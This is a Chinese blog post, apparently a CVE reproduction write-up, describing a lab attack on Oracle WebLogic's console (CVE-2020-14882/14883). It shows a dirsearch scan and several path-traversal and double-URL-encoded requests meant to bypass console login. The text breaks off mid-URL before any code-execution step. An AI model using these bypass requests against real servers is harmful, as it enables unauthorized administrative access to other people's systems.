Weblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882,3)

更多黑客技能 公众号:暗网黑客
作者:掌控安全-xiao_yi

0x01 信息收集

打开靶场地址,看到404页面不要慌张,先进行信息收集!

image.png

由于是靶场,就进行目录扫描,就不用进行子域名爆破了~

利用dirsearch进行爆破:

python3 dirsearch/dirsearch.py -u "http://172.23.26.66:7001/" -e \*

image.png

先访问200页面发现全是空页面,再尝试访问302重定向后的页面,发现了新天地!

image.png

发现这是一个WebLogic, 并且有版本号,此时只用百度一下,就发现了该版本存在多个漏洞,最后我将它定位在 CVE-2020-14882

0x02 复现

在读完博客中大佬对该漏洞的复现之后,尝试自己进行复现并拿到webshell。

0#01 权限漏洞绕过

在最初的这个页面,是需要账号和用户名登录才可以进入后台,但是这里可以进行目录的骚操作来进行直接无密码登录后台。

http://172.23.26.66:7001/console/css/../console.portal

这条构造的url表示由于 …/在目录中表示返回上一级目录, 即console这个目录,然后访问该目录下的后台文件

image.png

但是运行结果并不像我们像的那样, 还是被重定向到登陆页面

这里就需要一些小技巧进行绕过,用burp的url编码功能对…/进行编码

http://172.23.26.66:7001/console/images/%2E%2E%2Fconsole.portal

结果还是被重定向了

将大写换成小写

http://172.23.26.66:7001/console/images/%2e%2e%2fconsole.portal无果

再进行一次url编码

http://172.23.26.66:7001/console/images/%252e%252e
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值